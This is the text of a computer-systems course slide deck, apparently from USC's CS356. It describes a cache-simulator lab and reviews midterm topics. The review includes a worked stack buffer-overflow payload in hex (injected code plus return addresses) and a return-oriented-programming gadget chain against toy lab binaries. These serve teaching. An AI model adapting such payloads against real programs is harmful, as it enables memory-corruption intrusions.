CS356 : Discussion #9 Cache Lab & Review for Midterm II - PowerPoint PPT Presentation

CS356 : Discussion #9 Cache Lab & Review for Midterm II Illustrations from CS:APP3e textbook

Cache Lab Goal ● To write a small C simulator of caching strategies. ● Expect about 200-300 lines of code. Starting point in your repository. ● Traces ● The traces directory contains program traces generated by valgrind The format of each line is: <operation> <address>,<size> ● For example: “ I 0400d7d4,8 ” “ M 0421c7f0,4 ” “ L 04f6b868,8 ” ● Operations ○ Instruction load: I (ignore these) Data load: ␣ L (hit, miss, miss/eviction) ○ Data store: ␣ S (hit, miss, miss/eviction) ○ ○ Data modify: ␣ M (load+store: hit/hit, miss/hit, miss/eviction/hit) https://usc-cs356.github.io/assignments/cachelab.html

Reference Cache Simulator ./ csim-ref [-hv] -S <S> -K <K> -B <B> -p <P> -t <tracefile> -h Optional help flag that prints usage information -v Optional verbose flag that displays trace information -S <S> Number of sets (s=log2(S) is the number of bits used for the set index) -K <K> Number of lines per set (associativity) -B <B> Number of block size (i.e., use B = 2 b bytes / block) -p <P> Selects a policy, either LRU or FIFO -t <tracefile> select a trace $ ./ csim-ref -S 16 -K 1 -B 16 –p LRU -t traces/yi.trace hits:4 misses:5 evictions:3 $ ./ csim-ref -S 16 -K 1 -B 16 –p LRU -v -t traces/yi.trace L 10,1 miss M 20,1 miss hit ... ... M 12,1 miss eviction hit hits:4 misses:5 evictions:3 (See https://usc-cs356.github.io/assignments/cachelab.html )

Your Simulator Fill in the csim.c file to: ● Accept the same command-line options. ● Produce identical output. Rules ● Include name and username in the header. ● Use only C code (must compile with gcc -std=c11 ) Use malloc to allocate data structures for arbitrary S , K , B ● Implement both LRU and FIFO policies. ● ● Ignore instruction cache accesses (starting with I ). ● Memory accesses can cross block boundaries: ⇒ How to deal with this? At the end of your main function, call: ● printSummary (hit_count, miss_count, eviction_count)

Evaluation 3 test suites : ● Direct Mapped: K = 1; no need to implement an eviction policy ● Policy Tests: check that LRU and FIFO policies work correctly Size Tests: include memory accesses that cross a line boundary ● You only need to output the correct number of cache hits, misses, evictions . ● You can run csim-ref -v to check the expected behavior. Start from small traces such as traces/dave.traces ● Use the getopt library to parse command-line arguments. ● ○ int s = atoi(arg_str); int S = pow(2, s); You must pass all tests in a test suite to receive its points.

Review for Midterm II

Make sure you know this 1. Security Attacks ○ Protections from buffer overflow attacks? When do they work? ○ Gadgets? What are they? What is c3 ? How does ROP work? 2. Caches ○ Memory hierarchy, spatial and temporal locality ○ Direct-mapped, fully-associative, K-way cache Their different trade-offs: hit rate vs access time ○ 3. Virtual Memory ○ Page tables, hierarchical page tables, advantages, how they work... TLBs: Goal? Before or after the cache? What is the tag? Block offset? ○ Possible combinations of hit/miss for (TLB, page table, cache) ○ ○ Who updates the CPU cache / TLB / page table? And when? ○ Virtual memory and TLBs for different processes/threads 4. Struct Alignment and Assembly ○ Can you figure out the alignment/offsets of a given struct ?

Buffer Overflow: Invoking unreachable(42) #include <stdio.h> .LC0: hello: #include <stdlib.h> .string "The answer!" pushq %rbp .LC1: movq %rsp, %rbp void unreachable ( int val) { .string "Wrong." subq $16 , %rsp if (val == 42 ) unreachable: leaq - 6 (%rbp), %rax printf("The answer! \n "); pushq %rbp movq %rax, %rsi else movq %rsp, %rbp leaq .LC2 (%rip), %rdi printf("Wrong. \n "); subq $16 , %rsp movl $0 , %eax exit( 1 ); movl %edi, - 4 (%rbp) call __isoc99_scanf@PLT } cmpl $42 , - 4 (%rbp) leaq - 6 (%rbp), %rax jne .L2 movq %rax, %rsi void hello () { leaq .LC0 (%rip), %rdi leaq .LC3 (%rip), %rdi char buffer[ 6 ]; call puts@PLT movl $0 , %eax scanf("%s", buffer); jmp .L3 call printf@PLT printf("Hello, %s! \n ", buffer); .L2: nop } leaq .LC1 (%rip), %rdi leave call puts@PLT ret int main () { .L3: main: hello(); movl $1 , %edi pushq %rbp return 0 ; call exit@PLT movq %rsp, %rbp } .LC2: movl $0 , %eax .string "%s" call hello .LC3: movl $0 , %eax $ gcc -fno-stack-protector -no-pie .string "Hello, %s!\n" popq %rbp -z execstack target.c -o target ret

Preparing the input Preparing input_hex /* * Stack inside hello(): * --------------------- * [someone else's] (8 byte) * [return address] (8 byte) * [%rbp of caller] (8 byte) * [buffer array] (6 byte) */ 11 22 33 44 55 66 /* fill buffer[6] */ 48 c7 c7 2a 00 00 00 /* mov $0x2a,%rdi \ %rbp of */ c3 /* retq / caller */ c0 db ff ff ff 7f 00 00 /* hello return addr goes to mov */ d7 05 40 00 00 00 00 00 /* next retq goes to unreachable */

rtarget : Return-oriented Programming rtarget is more secure: ● It uses randomization to avoid fixed stack positions. ● The stack is marked as non-executable. Idea: return-oriented programming ● Find gadgets in executable areas. ● Gadget: short sequence of instructions followed by ret ( 0xc3 ) How do you load a value in a register using gadgets? 48 89 c7 encodes the void setval_210 ( unsigned *p) { *p = 3347663060U ; x86_64 instruction } movq %rax, %rdi 0000000000400f15 < setval_210 >: To start this gadget, set a 400f15 : c7 07 d4 48 89 c7 movl $0xc78948d4,(%rdi) return address to 0x400f18 400f1b : c3 retq (use little-endian format)

Return-oriented Programming: An example 0000000000400644 < main >: Notice that: 400644: 48 83 ec 08 sub $0x8 ,%rsp main calls getbuf at 40064d ● 400648: b8 00 00 00 00 mov $0x0 ,%eax 40064d: e8 dc ff ff ff callq 40062e < getbuf > ● getbuf calls Gets at 400635 passing %rsp which 000000000040062e < getbuf >: was decremented by $0x18 (24) 40062e: 48 83 ec 18 sub $0x18 ,%rsp ● So, we need to fill in 24 bytes, then start putting 400632: 48 89 e7 mov %rsp,%rdi 400635: e8 bc ff ff ff callq 4005f6 < Gets > return addresses and data (for pops) on the stack 40063a: b8 01 00 00 00 mov $0x1 ,%eax ● What return addresses? 0x400666 for touch , 40063f: 48 83 c4 18 add $0x18 ,%rsp 400643: c3 retq 0x400696 for gadget1 , 0x400698 for gadget2 0000000000400666 < touch >: ● What data? We can figure out that touch expects 400666: 48 83 ec 08 sub $0x8 ,%rsp 40066a: 48 83 ff 2a cmp $0x2a ,%rdi $0x2a (42) in %rdi and $0x10 (16) in %rsi 40066e: 75 12 jne 400682 < touch + 0x1c > 400670: 48 83 fe 10 cmp $0x10 ,%rsi The memory contents we want after the call to Gets : 400674: 75 0c jne 400682 < touch + 0x1c > 400676: bf 2f 07 40 00 mov $0x40072f ,%edi 0x0000000000 400666 [0x7fffffffdd20] 40067b: e8 30 fe ff ff callq 4004b0 < puts@plt > 400680: eb 0a jmp 40068c < touch + 0x26 > 0x00000000000000 10 [0x7fffffffdd18] 400682: bf 38 07 40 00 mov $0x400738 ,%edi 0x0000000000 400696 [0x7fffffffdd10] 400687: e8 24 fe ff ff callq 4004b0 < puts@plt > 40068c: bf 00 00 00 00 mov $0x0 ,%edi 0x0000000000 400698 [0x7fffffffdd08] 400691: e8 4a fe ff ff callq 4004e0 < exit@plt > 0x00000000000000 2a [0x7fffffffdd00] 0000000000400696 < gadget1 >: 0x0000000000 400696 [0x7fffffffdcf8] 400696: 5e pop %rsi 400697: c3 retq 0x8877665544332211 [0x7fffffffdcf0] 0000000000400698 < gadget2 >: 0x8877665544332211 [0x7fffffffdce8] 400698: 48 89 f7 mov %rsi,%rdi 40069b: c3 retq 0x8877665544332211 [0x7fffffffdce0] <= %rsp

CS356 : Discussion #9 Cache Lab & Review for Midterm II - PowerPoint PPT Presentation

CS356 : Discussion #9 Cache Lab & Review for Midterm II Illustrations from CS:APP3e textbook Cache Lab Goal To write a small C simulator of caching strategies. Expect about 200-300 lines of code. Starting point in your

Introduction to CS356 CS356 Object-Oriented Design and Programming http://cs356.yusun.io

SOLID: Principles of OOD CS356 Object-Oriented Design and Programming http://cs356.yusun.io

CS356 : Discussion #5 Assembly Procedures and Arrays Procedures Functions are a key abstraction

CS356 : Discussion #10 Dynamic Memory and Cache Lab Illustrations from CS:APP3e textbook Cache

CS356 : Discussion #11 Dynamic Memory, Allocation Lab and Linking Illustrations from CS:APP3e

CS356 : Discussion #13 Review for Final Exam Illustrations from CS:APP3e textbook Processor

CS356 : Discussion #4 Assembly Instructions & Debugging with GDB Last week: Operand Forms

CS356 : Discussion #3 Assembly Instructions What about programs that operate on data? Integer

CS356 : Discussion #14 Processor Architecture Marco Paolieri (paolieri@usc.edu) Illustrations

CS356 : Discussion #15 Review for Final Exam Marco Paolieri (paolieri@usc.edu) Illustrations

CS356 : Discussion #2 Integer Operations & Floating-Point Operations Integers in C (64-bit

CS356 Unit 4 Intro to x86 Instruction Set 4.2 Why Learn Assembly To understand something of

CS356 Unit 5 x86 Control Flow 5.2 JUMP/BRANCHING OVERVIEW 5.3 Concept of Jumps/Branches

CS356 Unit 10 Memory Allocation & Heap Management 10.2 BASIC OS CONCEPTS & TERMINOLOGY

CS356 Unit 6 x86 Procedures Basic Stack Frames 6.2 Review of Program Counter (IP register)

CS356 Unit 9 Virtual Memory & Address Translation 9.2 Indirection Indirection means

Cache Design Basics Nima Honarmand Spring 2018 :: CSE 502 Storage Hierarchy Make common case

Memory Hierarchy Design Chapter 5 and Appendix C 1 Overview Problem CPU vs Memory

Multicore Workshop Caches Mark Bull David Henty EPCC, University of Edinburgh Overview

Improving Cache Performance AMAT: Average Memory Access Time AMAT = T hit + Miss Rate x Miss

CENG3420 Lecture 09: Virtual Memory & Performance Bei Yu byu@cse.cuhk.edu.hk (Latest

ADMIN Ethics Discussion & Reading Quiz Wed April 12 Reading posted online

Cache Impact on Program Performance T. Yang. UCSB CS240A. 2017 Multi-level cache in computer

Roadmap Integers & floats Machine code & C C: Java: x86 assembly car *c =

CS356 : Discussion #9 Cache Lab & Review for Midterm II - PowerPoint PPT Presentation

CS356 : Discussion #9 Cache Lab & Review for Midterm II Illustrations from CS:APP3e textbook Cache Lab Goal To write a small C simulator of caching strategies. Expect about 200-300 lines of code. Starting point in your

Introduction to CS356 CS356 Object-Oriented Design and Programming http://cs356.yusun.io

SOLID: Principles of OOD CS356 Object-Oriented Design and Programming http://cs356.yusun.io

CS356 : Discussion #5 Assembly Procedures and Arrays Procedures Functions are a key abstraction

CS356 : Discussion #10 Dynamic Memory and Cache Lab Illustrations from CS:APP3e textbook Cache

CS356 : Discussion #11 Dynamic Memory, Allocation Lab and Linking Illustrations from CS:APP3e

CS356 : Discussion #13 Review for Final Exam Illustrations from CS:APP3e textbook Processor

CS356 : Discussion #4 Assembly Instructions &amp; Debugging with GDB Last week: Operand Forms

CS356 : Discussion #3 Assembly Instructions What about programs that operate on data? Integer

CS356 : Discussion #14 Processor Architecture Marco Paolieri (paolieri@usc.edu) Illustrations

CS356 : Discussion #15 Review for Final Exam Marco Paolieri (paolieri@usc.edu) Illustrations

CS356 : Discussion #2 Integer Operations &amp; Floating-Point Operations Integers in C (64-bit

CS356 Unit 4 Intro to x86 Instruction Set 4.2 Why Learn Assembly To understand something of

CS356 Unit 5 x86 Control Flow 5.2 JUMP/BRANCHING OVERVIEW 5.3 Concept of Jumps/Branches

CS356 Unit 10 Memory Allocation &amp; Heap Management 10.2 BASIC OS CONCEPTS &amp; TERMINOLOGY

CS356 Unit 6 x86 Procedures Basic Stack Frames 6.2 Review of Program Counter (IP register)

CS356 Unit 9 Virtual Memory &amp; Address Translation 9.2 Indirection Indirection means

Cache Design Basics Nima Honarmand Spring 2018 :: CSE 502 Storage Hierarchy Make common case

Memory Hierarchy Design Chapter 5 and Appendix C 1 Overview Problem CPU vs Memory

Multicore Workshop Caches Mark Bull David Henty EPCC, University of Edinburgh Overview

Improving Cache Performance AMAT: Average Memory Access Time AMAT = T hit + Miss Rate x Miss

CENG3420 Lecture 09: Virtual Memory &amp; Performance Bei Yu byu@cse.cuhk.edu.hk (Latest

ADMIN Ethics Discussion &amp; Reading Quiz Wed April 12 Reading posted online

Cache Impact on Program Performance T. Yang. UCSB CS240A. 2017 Multi-level cache in computer

Roadmap Integers &amp; floats Machine code &amp; C C: Java: x86 assembly car *c =

CS356 : Discussion #4 Assembly Instructions & Debugging with GDB Last week: Operand Forms

CS356 : Discussion #2 Integer Operations & Floating-Point Operations Integers in C (64-bit

CS356 Unit 10 Memory Allocation & Heap Management 10.2 BASIC OS CONCEPTS & TERMINOLOGY

CS356 Unit 9 Virtual Memory & Address Translation 9.2 Indirection Indirection means

CENG3420 Lecture 09: Virtual Memory & Performance Bei Yu byu@cse.cuhk.edu.hk (Latest

ADMIN Ethics Discussion & Reading Quiz Wed April 12 Reading posted online

Roadmap Integers & floats Machine code & C C: Java: x86 assembly car *c =